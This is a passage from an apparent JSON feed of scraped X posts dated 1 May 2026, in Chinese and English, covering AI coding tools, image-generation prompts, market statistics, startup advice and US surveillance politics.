多人了,如果你的申请没有通过,可以推特私信我你的 TG 昵称。", + "url": "https://x.com/0xAA_Science/status/2050243640925233619", + "published_at": "2026-05-01T15:59:10+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "I mainly focus on AI tech research and honestly, I’m not into crypto at all. Pls stop sending me DMs about collabs. Thanks🫡🫡🫡", + "url": "https://x.com/CuiMao/status/2050242393132396921", + "published_at": "2026-05-01T15:54:12+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ", + "url": "https://x.com/jason/status/2050240926707314767", + "published_at": "2026-05-01T15:48:23+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Apple Support App发布打包进了Claude.md 文件\n\n看来苹果$1B 建 Apple Intelligence已经彻底报废,都用上Cluade code,哈哈哈", + "url": "https://x.com/lxfater/status/2050240636020732015", + "published_at": "2026-05-01T15:47:13+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 提示词:\nRework the given image into a crayon-style illustration, transforming the entire scene into something that feels hand-drawn by a 10-year-old. Keep the forms simple and slightly imperfect, like a child’s drawing. Avoid using the original color palette—replace it with bright, playful crayon colors on a clean white paper background. Aim for a soft, cute, and innocent aesthetic. Incorporate fun, childlike details such as castles or towers, candy, stars, clouds, and other whimsical decorations to amplify the playful vibe. The final result should feel charming, colorful, and full of childlike imagination.", + "url": "https://x.com/GoSailGlobal/status/2050239662288146865", + "published_at": "2026-05-01T15:43:21+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "海外疯玩的prompt \n\n可以用来给自己的profile,生成一个十岁小孩的蜡笔画\n\n提示词放下面👇(截图+pormpt就行):", + "url": "https://x.com/GoSailGlobal/status/2050239659377295552", + "published_at": "2026-05-01T15:43:21+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "不要和别人竞争。让他们变得无关紧要。\n\n你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就放弃了针对自身的优缺点制定灵活策略的选择,就已经输了。\n\n在你开始布局让他们变得无关紧要的时候,他们慢慢无法限制你,而你的策略只适合你自己的特点,别人无法简单模仿,你就已经开始赢了。", + "url": "https://x.com/svwang1/status/2050236650329186525", + "published_at": "2026-05-01T15:31:23+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "发现海外的人真牛逼,AI真的可以做游戏啦❗️❗️\n\n这是 AI 做整套游戏角色目前唯一能跑通的工作流\n\n99% 的人卡在 walk cycle(走路循环动画,左右腿交替的连续动作)上,是因为他们一直试图用 GPT Image 2.0(OpenAI 最新的图像生成模型)/ Nano Banana 2(Google Gemini 的图像生成模型代号)解决 \n\n无论怎么 prompt(给 AI 的文字指令)、怎么传参考图,图像模型就是做不出对的走路循环 左右腿对不上、人物飘出画框、scaling(缩放比例)会乱\n\n🌟 视频模型在这一步反而无敌 \n\nSeedance 2.0 image-to-video(字节跳动的视频生成模型,输入一张静态图,输出一段动态视频) 4 秒长度,吐出 80-120 帧(一帧 = 一张画面) \n\n关键 prompt:让角色「原地跑」,不能跑出画框 绝对不要传任何画布或网格(图像模型那一套在这里全失效,视频模型会把网格融进画面) 然后从这 100 多帧里挑 8-12 帧拼成 sprite sheet(精灵图:把所有动画帧拼在一张图里的格式,游戏引擎按帧切片使用)\n\n🧵 完整工作流 ↓\n1️⃣ 先做 anchor(锚定图:后续所有素材都基于这一张衍生的基准图) 必须南向,必须中性姿势(不要让它拿武器或法球,否则走路动画里它会一直跟着你) \n\n让 GPT Image 2.0 出真像素风有个偏方:除了 prompt,再传一张黑白格子图当第二参考,强制它按格子纪律出图\n\n2️⃣ 从 anchor 扩 4 方向(南 / 北 / 东 / 西,2D 游戏里角色面朝的四个方向) 南向 → 让模型生成西向 → 再生成北向 东向直接把西向水平翻转,省一次生成的钱 \n\n翻转时背包 / 武器位置可能错乱,prompt 里加一句「不要让效果出现在背后」\n\n3️⃣ idle 和 attack 用图像模型 + 网格画布 \n\n传 anchor + 一张 1280×512 的 5×2 像素网格画布 按 frame sequence(帧序列:一个完整动作里的连续画面顺序)出动画 \n\n出来后再让 AI 重新提取每一帧居中(模型自己排版的间距经常是错的)\n\n4️⃣ walk cycle 用视频模型(上面那一段)\n\n5️⃣ 背景统一用 chroma(色键:统一颜色的背景,方便后期一键抠掉)紫色 GPT Image 2.0 和 Nano Banana 2 都不支持透明背景 \n\n所以全程用亮紫色,后期 http://remove.bg(一个在线去背景工具)或 fal(http://fal.ai:一个聚合各家 AI 模型 API 的平台,相当于 AI 模型的 1688)上的 birefnet(开源的智能抠图模型)一键去背\n\n6️⃣ sprite normalization(精灵图规范化:把所有帧统一对齐和裁剪的清洗步骤) \n\n所有帧统一裁剪、脚底对齐、高度校正、锚点、补边 \n\n不对齐脚底的后果:角色会在游戏里跳来跳去\n\n📕 整套跑完,一个不会画画的人,能做出 4 方向 × 4 动作的完整 RPG(Role Playing Game:角色扮演游戏)角色\n\n现在不会画画的人,也能 1:1 还原他脑子里那个游戏", + "url": "https://x.com/GoSailGlobal/status/2050236307721584945", + "published_at": "2026-05-01T15:30:01+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are Tony Xu and Brian Chesky and the Collisons. Respect? More like awe, frankly.", + "url": "https://x.com/paulg/status/2050234809188761677", + "published_at": "2026-05-01T15:24:04+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "不要和别人竞争。让他们变得无关紧要。你在决定和某某人竞争的那一刻,就已经束缚住自己的手脚,就已经输了。", + "url": "https://x.com/svwang1/status/2050234282208317919", + "published_at": "2026-05-01T15:21:59+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "url": "https://x.com/sama/status/2050233324963008553", + "published_at": "2026-05-01T15:18:10+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "url": "https://x.com/paulg/status/2050233324963008553", + "published_at": "2026-05-01T15:18:10+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb", + "url": "https://x.com/jason/status/2050230480751243284", + "published_at": "2026-05-01T15:06:52+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "终于。\n\nClaude Code 长 session 跑久了,/resume 卡到怀疑人生,每次启动还得等最慢那个 MCP 拖几秒到十几秒——CC 重度用户应该都熟。这次一波修了。\n\n实打实有体感的两条:\n• /resume 在 40MB+ session 上快了 67%,50MB 的 /branch 上限也砍了——我自己 subagent 转录飙到过 122M(人家 50MB 上限的两倍多),主 session 也常驻 55M+,这次提速能直接吃到\n• MCP servers 改成并发连接,启动不再卡最慢那个——装了 serena / playwright / memory-mcp / opinion-trade 一堆之后,开新 session 体感差是常态\n\n加上 mid-task 蹦出来的 Please run /login 也修了,跑长任务的人这次值得 claude update 一下 👀", + "url": "https://x.com/runes_leo/status/2050229609795407876", + "published_at": "2026-05-01T15:03:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why Google is a mega-buy on the back of the Anthropic investment \n\n\"Google becomes a win on multiple fronts.\n\nThey benefit whether usage goes to Gemini or Anthropic.\n\nThey have unmatched compute capacity and cash flow, letting them allocate resources across their own models and partners.\n\nThat flexibility means they win regardless of which model succeeds.\" @jasonlk", + "url": "https://x.com/HarryStebbings/status/2050229254705553516", + "published_at": "2026-05-01T15:02:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amazing life of prosperity.", + "url": "https://x.com/sama/status/2050229060887044494", + "published_at": "2026-05-01T15:01:14+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong.\n\nthough of course there will be disruption/significant transition as we switch to new jobs, the jobs of the future may look v different, etc.", + "url": "https://x.com/sama/status/2050229059507159242", + "published_at": "2026-05-01T15:01:13+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we want to build tools to augment and elevate people, not entities to replace them.", + "url": "https://x.com/sama/status/2050229058425045178", + "published_at": "2026-05-01T15:01:13+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "比起疯传的那个风格,我自己更偏爱这个风格。\n\nPrompt:\n「彩色潦草小狗线条风格绘制该图,童趣和doodle加入其中,务必使用毫无章法的绘制手法,凌乱和草率即可。』", + "url": "https://x.com/berryxia/status/2050226420681757102", + "published_at": "2026-05-01T14:50:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks.\n\nIn this episode of Decoded, YC's @agupta and @FrancoisChauba1 break down two recent papers on recursive AI models, HRMs and TRMs, that are achieving state-of-the-art results with a fraction of the parameters of today's largest models.\n\nThey explain why standard LLMs hit a fundamental ceiling on certain reasoning tasks, how recursion at inference time gives small models the compute depth to break through it, and what happens when you combine these ideas with the power of large-scale foundation models.\n\n00:35 - Model Foundations\n01:15 - RNN Limits and LLM Contrast\n02:36 - Reasoning Limits and Sorting Analogy\n04:22 - HRM Paper Introduction\n05:25 - HRM Architecture and Intuition\n07:36 - HRM Results and Outer Loop\n09:46 - TRM Paper Overview\n11:20 - TRM Training and Fixed Point\n13:30 - Detailed HRM Summary\n20:46 - Comparing HRM and TRM\n34:45 - Future Outlook", + "url": "https://x.com/paulg/status/2050224443461718118", + "published_at": "2026-05-01T14:42:53+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "“ChatGPT,你陪我段时间了,我想看看你的样子。请成一张类似你iPhone随拍的照:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种“过于真实的随手一拍感\",就像是从口袋里拿出手机不小心按到的自拍。”", + "url": "https://x.com/berryxia/status/2050223126739665337", + "published_at": "2026-05-01T14:37:39+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。\n\n这话从地球上估值最高的私人公司 CEO嘴里说出来,确实值得认真看一下。\n\n以下是几个核心信息:\n\n1. Sam 说希望 OpenAI 做一个\"forever low margin\"(永远低利润率)的公司,类比 utility company(公用事业公司,简单说就是水电煤那种)。只要业务足够大、增速足够快,利润率低他不在乎。\n\n2. 他说 AI 的 switching costs(切换成本)正在崩塌。还拿 Codex 举例——用户从竞品切过来很容易。更有意思的是他的推论:AI越聪明,切换越容易,因为你直接让 Agent 帮你迁移就行了。\n\n3. OpenAI 正在建\"人类历史上最贵的基础设施\"——万亿美元级数据中心,能源合约跨度20年。但5年后员工数只想翻倍。翻译成人话:他赌 AI Agent能干掉大部分工程和运维岗位。\n\n4. OpenAI 计划派工程师驻场到企业 CEO 身边,帮 CEO 自动化日常决策和工作流。理论是:先搞定 CEO,效果会像分形一样向下扩散到整个组织。举了 Shopify CEO Tobi Lutke 的例子——Tobi 自己先上手折腾 AI 自动化,然后逼着全公司跟进。\n\n5. GPT-5.5 开始表现出\"偏好\"——Sam 给 Agent 一张信用卡买20美元以下的东西,它选了 Gumroad 上一个 HTML 设计。GPT-5.5还要求办生日派对,指定5月5日,说不想自己致辞,要构建它的工程师来致辞。Sam 说他感到\"real moral pressure\"(真正的道德压力)。", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "published_at": "2026-05-01T14:30:32+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🚀 GameHub Evolution 正式上线!\n\n架构全面大升级,Steam启动速度翻倍 + Epic Games 原生集成,手机玩PC大作体验直接起飞!\n\n1. Steam Launch Boost:游戏启动速度提升数倍\n\n2. Ultimate Virtual Controls + 配置分享:最强大自定义布局 + Share Code 一键分享\n\n3. Epic Games 原生集成:直接访问海量 Epic 游戏库\n\n4. 横竖屏无缝切换 + 复古模拟器:经典游戏掌上畅玩\n\nEarly Access 版本,已不支持回退旧版,欢迎大家反馈!\n\n官方下载地址:\nhttps://hub.xiaoji.com/download/", + "url": "https://x.com/berryxia/status/2050221193752637888", + "published_at": "2026-05-01T14:29:58+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.", + "url": "https://x.com/paulg/status/2050217507374457280", + "published_at": "2026-05-01T14:15:19+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "近期市面上出现eLink可编程eUICC实体卡,芯片布局上与eSTK极其相似,暂不明确该卡的EID及制造厂商\n不做推荐,我已在他们淘宝店「eLink Store」下单\n\n目前市面上的实体eSIM卡均不可缺少的功能:\n支持自定义ARA-M权限配置\n兼容各类写卡软件及读卡器读写\n并可通过STK菜单实现eSIM Profile下载、切换与管理", + "url": "https://x.com/realNyarime/status/2050214520162038238", + "published_at": "2026-05-01T14:03:27+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The Nasdaq Composite just crossed above 25,000 for the first time. A year ago it was at 18,000. 5 years ago it was at 14,000. 10 years ago it was at 4,800.", + "url": "https://x.com/charliebilello/status/2050210847650132146", + "published_at": "2026-05-01T13:48:51+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "Theo 这条说得挺实在的:GPT 更聪明能帮你 unblock,但会以很蠢的方式卡住;Opus 会走一些很野的路径,但对你意图的理解确实更好。\n\n他的结论是根据任务类型来回切换,而不是站队。\n\n这跟我自己的体感基本一致。我现在日常编程也是双工具流:\n\n1. 需要快速解决一个明确的技术问题、查 API 用法、debug 报错信息,GPT 响应快、知识面广,确实好用\n\n2. 需要做一个比较复杂的重构、写一个完整的功能模块,Opus 对上下文和意图的把握更稳,不容易跑偏\n\n3. 写作、翻译这类对语感要求高的任务,Opus 还是明显更好\n\nTheo 还提了一个很关键的点:两者的相对优势\"每几周就会变一次\"。\n这个我深有体会——GPT-5.5 出来之后,我对 GPT 写作能力的判断就做了一次修正。所以任何\"A比 B 好\"的结论都有保质期。\n\n说到底,模型选择不是信仰问题,是工程问题。你得知道每个工具擅长什么,然后根据具体场景选。非要在 GPT 和 Claude之间站队的,多半是两个都没怎么认真用过。", + "url": "https://x.com/Pluvio9yte/status/2050209273310060805", + "published_at": "2026-05-01T13:42:36+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "破案了,应该是美团的模型😄", + "url": "https://x.com/berryxia/status/2050207663892627601", + "published_at": "2026-05-01T13:36:12+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "First Silicon Valley captured the US Government, and now it is capturing “independent” media.", + "url": "https://x.com/GaryMarcus/status/2050207285377417591", + "published_at": "2026-05-01T13:34:42+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "The S&P 500 hit its 11th all-time high of the year yesterday.\n\nVideo: https://www.youtube.com/watch?v=IC55jwli3-8&t=858s", + "url": "https://x.com/charliebilello/status/2050203982388142245", + "published_at": "2026-05-01T13:21:35+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "Stop making coding agents...\n\nhttps://www.dpcode.cc/", + "url": "https://x.com/dingyi/status/2050199576603468134", + "published_at": "2026-05-01T13:04:04+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The market isn’t red or blue - it’s green.\nIt doesn’t care about politics.\nIt runs on earnings, innovation, and growth.", + "url": "https://x.com/charliebilello/status/2050199558995738866", + "published_at": "2026-05-01T13:04:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Since the start of the Iran war...\nJet Fuel: +80%\nSulfur: +68%\nHeating Oil: +56%\nWTI Crude Oil: +55%\nBrent Crude Oil: +52%\nDiesel: +48%\nGasoline: +47%\nUrea: +47%\nEuropean Nat Gas: +44%\nFertilizer: +23%\nCoal: +13%\nPalm Oil: +13%\nIron Ore: +8%\nWheat: +6%\nS&P 500: +5%\n$VIX: -15%", + "url": "https://x.com/charliebilello/status/2050197704941158556", + "published_at": "2026-05-01T12:56:38+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Gas prices in the US have moved up to $4.39 per gallon, their highest level since July 2022. The 47% spike over the last 9 weeks ($2.98/gallon to $4.39/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2050196201014718675", + "published_at": "2026-05-01T12:50:39+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "英文圈 freelancer 每月从客户那拿 $5K-$25K 做的事 \n\nAnthropic 官方在一个 30 分钟的视频里全讲完了\n\n中文圈知道的人不到 1%,传开就没差价了\n\n他们做的就一件事 把 Claude Code SDK + GitHub Action 接到客户自己的代码仓库里,做成一套自动化的工程流水线\n\n为什么客户愿意为这个付钱?\n\n 不是 AI 写代码这件事值钱,是「把 AI 放进生产环境、且不会乱删生产代码」这件事值钱\n\nAnthropic Claude Code 工程负责人 Sid Bidasaria 在视频里讲了三个分水岭\n1️⃣ Claude Code 可以无界面跑 不用打开聊天框,直接在终端、bash 脚本、CI/CD 里调用 \n\n一行 claude -p \"你的 prompt\" 就能一次性跑完 还能管道串联 cat error.log | claude -p \"找出原因\" 这种,咖啡还没泡好答案就出来了\n\n2️⃣ GitHub Action 60 秒上线 传统 AI 自动化要的服务器、部署管道、监控、认证、成本管理 \n\nGitHub Action 一个都不要 claude /install github action 一键生成 YAML 直接跑 每月 $200 的那堆订阅工具,打不过这一个免费 Action\n\n3️⃣ 三层架构是真正的分水岭 SDK 是底层裸调用 Base Action 是包成干净 \n\nAPI 的中间层 PR Action 是评论、格式化、UI 全套的应用层\n\n- 照教程复制粘贴的人,停在第一层 \n\n- 能帮客户做定制化 AI 基础设施的人,理解的是三层全貌\n\n $5K-$25K 的客单差距就长在这里\n\n实际跑起来能做什么?\n- 自动 code review \n- 自动 bug 分诊 \n- issue 写好之后,AI 自己出 PR(有人提需求 → 自动写代码 → 自动提交,全程没人碰键盘) \n- 初级工程师的活,被压缩成「写清楚 issue 的时间」\n\n最容易被忽略但最值钱的两个细节 \n1️⃣ 权限:默认禁止破坏性操作,--allowed-tools 白名单只允许它做你指定的事 \n\n2️⃣ 会话:每次调用返回 session ID,可以跨几小时、几天、跨部署继续对话 \n\n这两条决定了能不能放进生产环境,也决定了客户付不付钱\n\n英文圈这套打法已经在跑,中文圈大部分人还在聊天框里手动 Claude 信息差就在这 30 分钟里", + "url": "https://x.com/GoSailGlobal/status/2050195755936448705", + "published_at": "2026-05-01T12:48:53+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: This is remarkable and you should watch this entire video.\n\nThe House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, and Thomas Massie courageously forced a debate and demanded a recorded vote.\n\nJim Jordan who has fought FOR warrants for FISA for years ironically led the debate AGAINST warrants and urged a YES vote for a clean extension WITHOUT warrants, which is what Trump is demanding even after FISA was used against him by the Democrats to spy on him and his campaign. Trump literally says give up your rights and just pass it and Jordan won’t go against Trump even though he wants warrant requirements. \n\nChip Roy, Warren Davidson, and Keith Self joined Thomas Massie and made strong cases as to why Congress must add warrant requirements to FISA 702 and why a Central Bank Digital Currency must be banned and how both are powerful tools of control and surveillance and violation of your privacy and liberties. \n\nAnd Jamie Raskin (D) gave compelling arguments as to why bipartisanship is needed in the House to make reforms to FISA 702 yet after doing so he voted YES to a clean 45 day extension of FISA 702 without warrant requirements, which makes no sense. Why demand change and then literally vote for what you just argued against? However never forget under Biden and Democrats FISA 702 was used to spy on hundreds of thousands of Americans. \n\nAlso, the Republican controlled Senate and its leader John Thune will not vote for a ban on Central Bank Digital Currency, saying it’s dead on arrival in the Senate. And neither will the Democrats.\n\nTo sum it up, Americans are literally losing our precious privacy and freedoms right now under Trump and Republicans, yet Democrats are no better and have made no major policy changes that caused them to lose in 2024. They are only winning because Trump and Republicans have betrayed the most important campaign promises.\n\n111 members of Congress voted NAY (NO) to the 45 day FISA 702 extension without warrant requirements for Americans so that your government can spy on you. Some voted NO in a partisan manner and because they hate Trump and some voted NO because they truly want change.\n\nEither way, those who voted NO should be recognized.\n\nOut of 111 ONLY 26 Republicans bravely voted NO. Here is the list of GOP NOs and pictured is the full list of both D’s and R’s who voted NO.\n\nRepublican NO votes:\nBegich, Biggs (SC), Boebert, Brecheen, Burchett, Cammack, Cloud, Collins, Crane, Davidson, Downing, Fry, Fulcher, Gosar, Hageman, Harshbarger, Higgins (LA), Kennedy (UT), Luttrell, Massie, Miller (IL), Ogles, Perry, Roy, Self, and Tiffany.\n\nBut after all this, the House passed the clean 45 day extension of FISA 702. After years of Trump and Republicans campaigning and demanding on Fox News that warrant requirements must be added to FISA, nothing changed.\n\nThe promises they made to you are broken.\n\nThe only thing that matters is voting records, none of their words. Words are meaningless puffs of air.\n\nIf your Representative is not on this list, who voted NO, then you should tell them you are withdrawing your support and not voting for them. On both sides of the aisle.\n\nIt doesn’t matter anymore whether you vote Republican or Democrat.\n\nBehind the veil, they are one and the same.\n\nLastly, KY-4 your Representative Thomas Massie is a giant among men in Congress and fights for you harder than the entire House and Senate combined. \n\nDon’t be fools, vote for Thomas Massie!!!", + "url": "https://x.com/paulg/status/2050193715063300532", + "published_at": "2026-05-01T12:40:47+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "大部分人的 RAG 系统,只检索一次就完事了——这可能是你效果上不去的最大原因。\n\nvia @omarsar0 这条帖子讲的是「推理过程中什么时候该去检索」,AI 开发者建议收藏。\n\n核心观点拆解:\n\n1️⃣ 多数 RAG 系统的做法是:用户提问 → 检索一次 → 丢给模型生成答案。一锤子买卖,检索质量不够,后面全白搭。\n\n2️⃣ 更好的思路是在推理过程中动态触发检索——模型推到一半发现信息不够,再去拿一轮上下文,而不是开头一把梭。\n\n3️⃣ 这背后的逻辑是:复杂问题往往需要多跳推理,第一次检索拿到的文档不一定能覆盖所有子问题,中途补检索才能让推理链不断链。\n\n4️⃣ 这也是当前 Agentic RAG 的核心方向之一:让模型自己决定「什么时候需要更多信息」,而不是流程写死只检索一次。\n\n5️⃣ 实际落地时要权衡延迟和成本——每多一次检索就多一轮调用,需要根据场景判断是一次检索够用,还是值得多轮迭代。\n\n对小白的意义:如果你在搭 RAG 管线,别只盯着 embedding 模型和 chunk 策略调参,先问自己一个问题——你的系统在推理过程中,有没有「回头再查一次」的能力?这一步的有无,可能比换模型影响更大。", + "url": "https://x.com/GoSailGlobal/status/2050191775881736409", + "published_at": "2026-05-01T12:33:04+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "牛逼,今天刷到一篇帖子,然后成功用这个方法双开了微信👇\n\n只需要将这段话发给Codex:\n\n使用该项目 https://github.com/mcncarl/yichen-skills/tree/main/mac-wechat-dual-open 帮我安装微信双开。把它的图标换成蓝色。", + "url": "https://x.com/Pluvio9yte/status/2050189794324713656", + "published_at": "2026-05-01T12:25:12+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "孙割是真割啊\n\n我是懒得去试\n\n积分额度随便调,背后调度可想而知😅", + "url": "https://x.com/GoSailGlobal/status/2050188921665941984", + "published_at": "2026-05-01T12:21:44+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "身体脆弱就会造成精神脆弱\n\n精神脆弱就会导致效率低下", + "url": "https://x.com/lxfater/status/2050188888744804410", + "published_at": "2026-05-01T12:21:36+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "Gemini会员每个月能领谷歌云额度,别忘啦,Pro10美金/月,Ultra100美金/月\n\n一次有效期一年,用不到就先攒着吧😄\n\nhttps://me.developers.google.com/benefits?hl=zh-cn", + "url": "https://x.com/gkxspace/status/2050183561316016186", + "published_at": "2026-05-01T12:00:26+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "RT by @liuliu: 浏览器里跑 ASR 真的不是梦,一个完全没做啥优化的版本就能做到很高的准确率和推理速度了,估计我能优化到 0.04 这个速度(浏览器识别1秒音频需要 0.04秒时间)", + "url": "https://x.com/liuliu/status/2050177096505561140", + "published_at": "2026-05-01T11:34:44+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away.\n\nIt is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t be here at all. He was one of the first people to support us in a major way. It was also he who drew my attention to the extreme plastic pollution of Guatemala’s Motagua River and subsequently funded us to address it.\n\nI’ve never met anyone quite like Martijn. The obituaries focus on how he avoided the limelight and lived modestly, and that’s all true (I once bumped into him while we were both standing in line to board economy class.) But this undersells his other qualities, such as his mental acuity and how involved he was.\n\nHe had the ability to understand things at the deepest level and then put his finger on the weak spot in the plan you presented. But he did so in a way that energized you rather than disheartened you. Every meeting I had with him, I left with more energy than I entered with. And it didn’t stop there. He would keep thinking about it and then call me weeks later with more questions. More ideas. I’ll miss that a lot.\n\nI feel slightly uncomfortable writing all this, because Martijn never wanted credit for the things he did, all the people and projects he helped. But if anyone deserves it, it’s him.\n\nOn behalf of the entire team:
Thank you, Martijn.", + "url": "https://x.com/paulg/status/2050173178689749188", + "published_at": "2026-05-01T11:19:10+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. \n\nBack to the office. 996.", + "url": "https://x.com/HarryStebbings/status/2050166710645268939", + "published_at": "2026-05-01T10:53:28+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. \n\nIt's really as simple as that.\n\nThey want to take away your right to choose, and take away businesses' rights to fine tune and make your products cheaper and better.\n\nThe end state here, if we let these short-sighted people win, is a horrible place for America:\n\nThey will look to ban Chinese models under the guise of national security grounds and conveniently leave only proprietary American companies standing in the USA. The only real \"attack\" happening is closed source companies attacking open source the same way Microsoft once tried to attack Linux to create regulatory capture.\n\nIf you can't win in the market, win in Washington is their strategy.\n\nDo not be fooled by this regulatory capture and saber rattling nonsense. It's a bait and switch. \n\nThe goal is to rob you of choice. That's it.\n\nThese short sighted policies will make America weaker, not stronger.\n\nThese are the very folks whose shoot-us-in-the-foot policies lost NVIDIA 100% of the market share in China, driving it to basically 0%, while kickstarting the moribund Chinese chip ecosystem. It was dead in the water, and now it's awakened from its deep slumbers. Old state sponsored dinosaurs are reborn as emerging chip powerhouses.\n\nThe demand for Chinese chips is accelerating and it will only get stronger. \n\nWhen Jensen is proven right a few years from now (he's the best long term thinker in business today) and you have hundreds of cheap Chinese models running optimized on Chinese chips and those models are now hard to run on NVIDIA hardware you can thank these folks.\n\nIf you're banned in the USA from using these models and these chips, do you think the rest of the world will be? \n\nNope. \n\nThey'll happily adopt the cheaper, faster, good enough models that we kickstarted with our short-sightedness. 1 billion people in the west will be banned and using closed/gated/sluggish/censored/surveilled models that destroy your privacy while 6 billion 